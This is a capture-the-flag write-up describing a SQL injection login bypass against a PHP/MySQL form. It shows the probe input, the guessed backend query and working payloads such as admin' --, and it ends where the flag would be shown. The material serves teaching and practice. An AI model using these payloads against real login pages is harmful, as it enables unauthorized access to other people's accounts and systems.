🚩 Web Exploitation — SQL Injection Bypass

🔍 Step 1 — Reconnaissance

First, I inspected the page source and found a standard HTML login form submitting via POST to /login.php. No JavaScript validation was present. Checking HTTP headers revealed the server was running PHP on Apache.

# Testing with basic injection
Username: admin'
Password: anything

# Server returned a MySQL error — injection confirmed!
# Error: You have an error in your SQL syntax near ''' at line 1

⚙️ Step 2 — Understanding the Query

The backend SQL query likely looks like this:

SELECT * FROM users WHERE username = '$username' AND password = '$password';

Since input is not sanitized, we can inject SQL to manipulate the logic. The goal is to make the WHERE clause always evaluate to TRUE, bypassing password verification.

💥 Step 3 — Exploitation

1. Injected ' OR '1'='1 in the username field — resulted in an error, quotes are unbalanced.
2. Tried ' OR 1=1 -- — the comment -- ignores the rest of the query including the password check.
3. Final payload: admin' -- in username, anything in password.
4. The query becomes: SELECT * FROM users WHERE username = 'admin' --' AND password = '...'
5. Login bypassed — redirected to admin panel with flag exposed!

# Successful payload
Username: admin' --
Password: anything123

# Resulting query (password check commented out):
SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything123';
# ↑ Executed as: SELECT * FROM users WHERE username = 'admin'
# → Returns the admin row → Auth bypass ✓

🚩 Step 4 — Flag Retrieved

After successful authentication bypass, the admin dashboard loaded and displayed the flag: